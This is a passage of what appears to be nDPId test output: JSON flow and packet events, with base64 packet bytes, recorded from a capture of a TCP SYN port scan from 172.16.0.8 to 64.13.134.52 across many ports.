+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1513,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/fMAADAGGn+sEAAIQA2GNIzTDMXdU4MZAAAAAGACBAAnxwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1514,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAskBMAACkGj1+sEAAIQA2GNIzTB9fdU4MZAAAAAGACCAAotQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsfuEAADkGkJGsEAAIQA2GNIzTGaXdU4MZAAAAAGACCAAW5wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1526,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1516,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/zgAACwGHTqsEAAIQA2GNIzTDzHdU4MZAAAAAGACBAAlWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1527,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1517,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsSNkAADcGyJmsEAAIQA2GNIzSBFndUoMYAAAAAGACEAAkNgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1528,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsMkkAACkG7SmsEAAIQA2GNIzSD5LdUoMYAAAAAGACCAAg\/QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060744,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1529,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1519,"flow_packet_id":1,"flow_last_seen":1278275060744,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060744,"pkt":"ACYLMQczACWzv5HuCABFAAAsmhQAACcGh16sEAAIQA2GNIzSIPvdUoMYAAAAAGACEAAHlAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1530,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1520,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsTp0AACcG0tWsEAAIQA2GNIzSBB7dUoMYAAAAAGACEAAkcQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1531,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAssqIAACgGbdCsEAAIQA2GNIzSVEPdUoMYAAAAAGACBADgSwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5950,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1532,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1522,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAs7IIAAC4GLfCsEAAIQA2GNIzSFz7dUoMYAAAAAGACDAAVUQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1533,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsgF8AADEGlxOsEAAIQA2GNIzSI4zdUoMYAAAAAGACCAANAwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49400,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1534,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1524,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsiDYAADsGhTysEAAIQA2GNIzSwPjdUoMYAAAAAGACEABnlgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1130,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1535,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1525,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsHRgAADcG9FqsEAAIQA2GNIzSBGrdUoMYAAAAAGACEAAkJQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1536,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsbK4AACcGtMSsEAAIQA2GNIzSCzvdUoMYAAAAAGACEAAdVAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060746,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1537,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_packet_id":1,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060746,"pkt":"ACYLMQczACWzv5HuCABFAAAsOMAAADoG1bKsEAAIQA2GNIzSgBDdUoMYAAAAAGACDACsfgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060763,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060763,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1538,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1528,"flow_packet_id":1,"flow_last_seen":1278275060763,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060763,"pkt":"ACYLMQczACWzv5HuCABFAAAsMaMAACoG7M+sEAAIQA2GNIzSBhTdUoMYAAAAAGACDAAmewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060764,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060764,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1539,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1529,"flow_packet_id":1,"flow_last_seen":1278275060764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060764,"pkt":"ACYLMQczACWzv5HuCABFAAAsCNAAADYGCaOsEAAIQA2GNIzSA\/7dUoMYAAAAAGACDAAokQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1026,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1540,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1530,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qIAADcGLtCsEAAIQA2GNIzTBALdU4MZAAAAAGACEAAkigAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1541,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1531,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsLe8AADIG6IOsEAAIQA2GNIzTITTdU4MZAAAAAGACDAALWAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5815,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1542,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1532,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAss7UAADIGYr2sEAAIQA2GNIzTFrfdU4MZAAAAAGACDAAV1QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1543,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1533,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAs0wAAACUGUHKsEAAIQA2GNIzSBE7dUoMYAAAAAGACCAAsQQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1534,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsGdwAADgG9pasEAAIQA2GNIzS1w\/dUoMYAAAAAGACBABdfwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3371,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1535,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsiwEAAC0GkHGsEAAIQA2GNIzSDSvdUoMYAAAAAGACCAAjZAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060796,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060796,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1546,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1536,"flow_packet_id":1,"flow_last_seen":1278275060796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060796,"pkt":"ACYLMQczACWzv5HuCABFAAAsYX4AACoGvPSsEAAIQA2GNIzSJyndUoMYAAAAAGACDAAFZgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060797,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1537,"flow_packet_id":1,"flow_last_seen":1278275060797,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060797,"pkt":"ACYLMQczACWzv5HuCABFAAAsvdoAACUGZZisEAAIQA2GNIzSAmjdUoMYAAAAAGACCAAuJwAAAgQFtA=="} 